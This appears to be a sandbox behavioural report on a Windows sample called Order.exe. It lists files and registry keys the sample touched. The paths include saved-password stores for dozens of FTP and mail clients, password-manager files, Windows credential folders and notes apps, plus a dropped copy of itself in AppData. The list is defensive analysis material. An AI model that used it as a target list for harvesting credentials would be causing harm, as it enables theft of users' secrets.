C:\Program Files (x86)\NexusFile\userdata\ftpsite.ini C:\Users\Seven01\AppData\Roaming\NexusFile\ftpsite.ini C:\Users\Seven01\Documents\NetSarang\Xftp\Sessions C:\Users\Seven01\AppData\Roaming\NetSarang\Xftp\Sessions C:\Program Files (x86)\EasyFTP\data C:\Users\Seven01\AppData\Roaming\SftpNetDrive C:\Program Files (x86)\AbleFTP7\encPwd.jsd C:\Program Files (x86)\AbleFTP7\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\AbleFTP7\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\AbleFTP8\encPwd.jsd C:\Program Files (x86)\AbleFTP8\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\AbleFTP8\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\AbleFTP9\encPwd.jsd C:\Program Files (x86)\AbleFTP9\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\AbleFTP9\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\AbleFTP10\encPwd.jsd C:\Program Files (x86)\AbleFTP10\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\AbleFTP10\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\AbleFTP11\encPwd.jsd C:\Program Files (x86)\AbleFTP11\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\AbleFTP11\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\AbleFTP12\encPwd.jsd C:\Program Files (x86)\AbleFTP12\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\AbleFTP12\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\AbleFTP13\encPwd.jsd C:\Program Files (x86)\AbleFTP13\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\AbleFTP13\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\AbleFTP14\encPwd.jsd C:\Program Files (x86)\AbleFTP14\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\AbleFTP14\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\JaSFtp7\encPwd.jsd C:\Program Files (x86)\JaSFtp7\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\JaSFtp7\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\JaSFtp8\encPwd.jsd C:\Program Files (x86)\JaSFtp8\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\JaSFtp8\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\JaSFtp9\encPwd.jsd C:\Program Files (x86)\JaSFtp9\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\JaSFtp9\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\JaSFtp10\encPwd.jsd C:\Program Files (x86)\JaSFtp10\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\JaSFtp10\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\JaSFtp11\encPwd.jsd C:\Program Files (x86)\JaSFtp11\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\JaSFtp11\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\JaSFtp12\encPwd.jsd C:\Program Files (x86)\JaSFtp12\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\JaSFtp12\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\JaSFtp13\encPwd.jsd C:\Program Files (x86)\JaSFtp13\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\JaSFtp13\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\JaSFtp14\encPwd.jsd C:\Program Files (x86)\JaSFtp14\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\JaSFtp14\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\Automize7\encPwd.jsd C:\Program Files (x86)\Automize7\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\Automize7\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\Automize8\encPwd.jsd C:\Program Files (x86)\Automize8\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\Automize8\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\Automize9\encPwd.jsd C:\Program Files (x86)\Automize9\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\Automize9\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\Automize10\encPwd.jsd C:\Program Files (x86)\Automize10\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\Automize10\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\Automize11\encPwd.jsd C:\Program Files (x86)\Automize11\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\Automize11\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\Automize12\encPwd.jsd C:\Program Files (x86)\Automize12\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\Automize12\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\Automize13\encPwd.jsd C:\Program Files (x86)\Automize13\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\Automize13\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\Automize14\encPwd.jsd C:\Program Files (x86)\Automize14\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\Automize14\data\settings\ftpProfiles-j.jsd C:\Users\Seven01\AppData\Roaming\Cyberduck C:\Users\Seven01\AppData\Roaming\iterate_GmbH C:\Users\Seven01\.config\fullsync\profiles.xml C:\Users\Seven01\AppData\Roaming\FTPInfo\ServerList.xml C:\Users\Seven01\AppData\Roaming\FTPInfo\ServerList.cfg C:\Program Files (x86)\FileZilla\Filezilla.xml C:\Users\Seven01\AppData\Roaming\FileZilla\filezilla.xml C:\Users\Seven01\AppData\Roaming\FileZilla\recentservers.xml C:\Users\Seven01\AppData\Roaming\FileZilla\sitemanager.xml C:\Program Files (x86)\Staff-FTP\sites.ini C:\Users\Seven01\AppData\Roaming\BlazeFtp\site.dat C:\Program Files (x86)\Fastream NETFile\My FTP Links C:\Program Files (x86)\GoFTP\settings\Connections.txt C:\Users\Seven01\AppData\Roaming\Estsoft\ALFTP\ESTdb2.dat C:\Program Files (x86)\DeluxeFTP\sites.xml C:\Windows\wcx_ftp.ini C:\Users\Seven01\AppData\Roaming\wcx_ftp.ini C:\Users\Seven01\wcx_ftp.ini C:\Users\Seven01\AppData\Roaming\GHISLER\wcx_ftp.ini C:\Program Files (x86)\FTPGetter\Profile\servers.xml C:\Users\Seven01\AppData\Roaming\FTPGetter\servers.xml C:\Program Files (x86)\WS_FTP\WS_FTP.INI C:\Windows\WS_FTP.INI C:\Users\Seven01\AppData\Roaming\Ipswitch C:\Users\Seven01\site.xml C:\Users\Seven01\AppData\Local\PokerStars* C:\Users\Seven01\AppData\Local\ExpanDrive C:\Users\Seven01\AppData\Roaming\Steed\bookmarks.txt C:\Users\Seven01\AppData\Roaming\FlashFXP C:\ProgramData\FlashFXP C:\Users\Seven01\AppData\Local\INSoftware\NovaFTP\NovaFTP.db C:\Users\Seven01\AppData\Roaming\NetDrive\NDSites.ini C:\Users\Seven01\AppData\Roaming\NetDrive2\drives.dat C:\ProgramData\NetDrive2\drives.dat C:\Users\Seven01\AppData\Roaming\SmartFTP C:\Users\Seven01\AppData\Roaming\Far Manager\Profile\PluginsData\42E4AEB1-A230-44F4-B33C-F195BB654931.db C:\Users\Seven01\Documents\*.tlp C:\Users\Seven01\Documents\*.bscp C:\Users\Seven01\Documents\*.vnc C:\Users\Seven01\Desktop\*.vnc C:\Users\Seven01\Documents\mSecure C:\ProgramData\Syncovery C:\Program Files (x86)\FreshWebmaster\FreshFTP\FtpSites.SMF C:\Users\Seven01\AppData\Roaming\BitKinex\bitkinex.ds C:\Users\Seven01\AppData\Roaming\UltraFXP\sites.xml C:\Users\Seven01\AppData\Roaming\FTP Now\sites.xml C:\Program Files (x86)\Odin Secure FTP Expert\QFDefault.QFQ C:\Program Files (x86)\Odin Secure FTP Expert\SiteInfo.QFP C:\Program Files (x86)\Foxmail\mail C:\Foxmail* C:\Users\Seven01\AppData\Roaming\Pocomail\accounts.ini C:\Users\Seven01\Documents\Pocomail\accounts.ini C:\Users\Seven01\AppData\Roaming\GmailNotifierPro\ConfigData.xml C:\Users\Seven01\AppData\Roaming\DeskSoft\CheckMail C:\Program Files (x86)\WinFtp Client\Favorites.dat C:\Windows\32BitFtp.TMP C:\Windows\32BitFtp.ini C:\FTP Navigator\Ftplist.txt C:\Softwarenetz\Mailing\Daten\mailing.vdt C:\Users\Seven01\AppData\Roaming\Opera Mail\Opera Mail\wand.dat C:\Users\Seven01\Documents\*Mailbox.ini C:\Users\Seven01\Documents\yMail2\POP3.xml C:\Users\Seven01\Documents\yMail2\SMTP.xml C:\Users\Seven01\Documents\yMail2\Accounts.xml C:\Users\Seven01\Documents\yMail\ymail.ini C:\Users\Seven01\AppData\Roaming\TrulyMail\Data\Settings\user.config C:\Users\Seven01\Documents\*.spn C:\Users\Seven01\Desktop\*.spn C:\Users\Seven01\AppData\Roaming\To-Do DeskList\tasks.db C:\Users\Seven01\AppData\Roaming\stickies\images C:\Users\Seven01\AppData\Roaming\stickies\rtf C:\Users\Seven01\AppData\Roaming\NoteFly\notes C:\Users\Seven01\AppData\Roaming\Conceptworld\Notezilla\Notes8.db C:\Users\Seven01\AppData\Roaming\Microsoft\Sticky Notes\StickyNotes.snt C:\Users\Seven01\Documents C:\Users\Seven01\Documents\*.kdbx C:\Users\Seven01\Desktop C:\Users\Seven01\Desktop\*.kdbx C:\Users\Seven01\Documents\*.kdb C:\Users\Seven01\Desktop\*.kdb C:\Users\Seven01\Documents\Enpass C:\Users\Seven01\Documents\My RoboForm Data C:\Users\Seven01\Documents\1Password C:\Users\Seven01\AppData\Local\Temp\Mikrotik\Winbox C:\Windows\Microsoft.NET\Framework\v2.0.50727\NETAPI32.DLL C:\Windows\System32\netapi32.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\netutils.dll C:\Windows\System32\netutils.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\srvcli.dll C:\Windows\System32\srvcli.dll C:\Users\Seven01\AppData\Roaming\E62877 C:\Users\Seven01\AppData\Roaming\E62877\73E4A9.lck C:\Users\Seven01\AppData\Roaming\Microsoft\Credentials C:\Users\Seven01\AppData\Roaming\Microsoft\Credentials\* C:\Users\Seven01\AppData\Local\Microsoft\Credentials C:\Users\Seven01\AppData\Local\Microsoft\Credentials\* C:\Users\Seven01\AppData\Roaming\E62877\73E4A9.exe C:\Windows\Temp C:\Windows\sysnative\Tasks\Microsoft\Windows\WDI\ResolutionHost C:\Windows\sysnative\LogFiles\Scm\9435f817-fed2-454e-88cd-7f78fda62c48 C:\Windows\Microsoft.NET\Framework\v4.0.30319\ndpsetup.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngenservicelock.dat C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngenrootstorelock.dat C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\fusion.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen_service.log C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe.config C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngenservicetestlock.dat C:\Windows\Microsoft.NET\ngenserviceclientlock.dat C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ndpsetup.bat C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngenservicelock.dat C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngenrootstorelock.dat C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll C:\Windows\Microsoft.NET\Framework64\v4.0.30319\fusion.dll C:\Windows\sysnative\mscoree.dll.local C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll
Read Files
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll C:\Users\Seven01\AppData\Local\Temp\Order.exe.config C:\Users\Seven01\AppData\Local\Temp\Order.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll C:\Windows\System32\MSVCR120_CLR0400.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config C:\Windows\Globalization\Sorting\sortdefault.nls C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\96c8ba86b82ee32f586da00a8b721fda\mscorlib.ni.dll.aux C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\96c8ba86b82ee32f586da00a8b721fda\mscorlib.ni.dll \Device\KsecDD C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\nlssorting.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\SortDefault.nlp C:\Windows\assembly\pubpol23.dat C:\Windows\assembly\NativeImages_v4.0.30319_32\System\ea5ca00aa792b96c036a1b3d57b28f9a\System.ni.dll.aux C:\Windows\assembly\NativeImages_v4.0.30319_32\System\ea5ca00aa792b96c036a1b3d57b28f9a\System.ni.dll C:\Users\Seven01\AppData\Local\Temp\ft3lrpxo.dll C:\Users\Seven01\AppData\Local\Temp\ft3lrpxo.pdb C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\00ea0c71c0a045ebceae2b3d938d251f\System.Drawing.ni.dll.aux C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\00ea0c71c0a045ebceae2b3d938d251f\System.Drawing.ni.dll C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll C:\Windows\SysWOW64\it-IT\KERNELBASE.dll.mui C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\feeacef715fd335a37a58022b3a2fefb\Microsoft.VisualBasic.ni.dll.aux C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8811a034e0362a8ec740c44c7136725b\System.Core.ni.dll.aux C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8811a034e0362a8ec740c44c7136725b\System.Core.ni.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\feeacef715fd335a37a58022b3a2fefb\Microsoft.VisualBasic.ni.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\1033\cscui.dll C:\Users\Seven01\AppData\Local\Temp\ft3lrpxo.cmdline C:\Windows\Microsoft.NET\Framework\v4.0.30319\alink.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe.config C:\Users\Seven01\AppData\Local\Temp\ft3lrpxo.0.cs C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Management.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Drawing.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Core.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorpehost.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\diasymreader.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\default.win32manifest C:\Users\Seven01\AppData\Local\Temp\CSCEDDBAB3124834608A4D661E9537B99ED.TMP C:\Users\Seven01\AppData\Local\Temp\RES2FF4.tmp C:\Windows\System32\tzres.dll C:\Windows\System32\netapi32.dll C:\Windows\System32\netutils.dll C:\Windows\System32\srvcli.dll C:\Users\Seven01\AppData\Roaming\E62877\73E4A9.lck C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\fusion.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen_service.log C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe.config C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll C:\Windows\Microsoft.NET\Framework64\v4.0.30319\fusion.dll C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll
Write Files
C:\Users\Seven01\AppData\Local\Temp\ft3lrpxo.tmp C:\Users\Seven01\AppData\Local\Temp\ft3lrpxo.0.cs C:\Users\Seven01\AppData\Local\Temp\ft3lrpxo.dll C:\Users\Seven01\AppData\Local\Temp\ft3lrpxo.cmdline C:\Users\Seven01\AppData\Local\Temp\ft3lrpxo.out C:\Users\Seven01\AppData\Local\Temp\ft3lrpxo.err C:\Users\Seven01\AppData\Local\Temp\ft3lrpxo.pdb C:\Users\Seven01\AppData\Local\Temp\CSCEDDBAB3124834608A4D661E9537B99ED.TMP C:\Users\Seven01\AppData\Local\Temp\RES2FF4.tmp C:\Users\Seven01\AppData\Roaming\E62877\73E4A9.lck C:\Users\Seven01\AppData\Roaming\E62877\73E4A9.exe C:\Windows\sysnative\LogFiles\Scm\9435f817-fed2-454e-88cd-7f78fda62c48 C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngenservicelock.dat C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngenrootstorelock.dat C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen_service.log C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngenservicelock.dat C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngenrootstorelock.dat
Delete Files
C:\Users\Seven01\AppData\Local\Temp\ft3lrpxo.err C:\Users\Seven01\AppData\Local\Temp\ft3lrpxo.dll C:\Users\Seven01\AppData\Local\Temp\ft3lrpxo.pdb C:\Users\Seven01\AppData\Local\Temp\ft3lrpxo.cmdline C:\Users\Seven01\AppData\Local\Temp\ft3lrpxo.out C:\Users\Seven01\AppData\Local\Temp\ft3lrpxo.tmp C:\Users\Seven01\AppData\Local\Temp\ft3lrpxo.0.cs C:\Users\Seven01\AppData\Local\Temp\RES2FF4.tmp C:\Users\Seven01\AppData\Local\Temp\CSCEDDBAB3124834608A4D661E9537B99ED.TMP C:\Users\Seven01\AppData\Roaming\E62877\73E4A9.lck C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\ngenserviceclientlock.dat
Keys
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\ HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\v4.0 HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir HKEY_CURRENT_USER\Software\Microsoft\.NETFramework HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR Policy\Standards HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards\v4.0.30319 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\v4.0.30319\SKUs\ HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\v4.0.30319\SKUs\default HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\NET Framework Setup\NDP\v4\Full\Release HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Order.exe HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB HKEY_CURRENT_USER\Software\Microsoft\Fusion HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseRetryAttempts HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseMillisecondsBetweenRetries HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\NGen\Policy\v4.0 HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGen\Policy\v4.0\OptimizeUsedBinaries HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\Servicing HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT HKEY_LOCAL_MACHINE\Software\Microsoft\StrongName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLEAUT HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AltJit HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Language Groups HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000410 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1 HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\PublisherPolicy\Default HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index23 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Configuration__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Configuration__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Xml__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Xml__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\APTCA HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Defaults\Provider Types\Type 024 HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Defaults\Provider Types\Type 024\Name HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Drawing__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Drawing__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots HKEY_CLASSES_ROOT\CLSID\{FAE3D380-FEA4-4623-8C75-C6B61110B681}\Instance HKEY_CLASSES_ROOT\CLSID\{FAE3D380-FEA4-4623-8C75-C6B61110B681}\Instance\Disabled HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-us HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-us HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000409 HKEY_CURRENT_USER\Software\Classes HKEY_CURRENT_USER\Software\Classes\AppID\Order.exe HKEY_LOCAL_MACHINE\Software\Microsoft\OLE\AppCompat HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\AppCompat\RaiseDefaultAuthnLevel HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\DefaultAccessPermission HKEY_CURRENT_USER\Software\Classes\Interface\{00000134-0000-0000-C000-000000000046} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\Software\Microsoft\Rpc\Extensions HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\NdrOleExtDLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\RemoteRpcDll HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BFE HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledProcesses\ HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\B204B4C2 HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledSessions\ HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.10.0.Microsoft.VisualBasic__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.10.0.Microsoft.VisualBasic__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Core__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Core__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Numerics__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Numerics__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Security__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Security__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Windows.Forms__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Windows.Forms__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Deployment__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Deployment__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Management__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Management__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Xml.Linq__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Xml.Linq__b77a5c561934e089 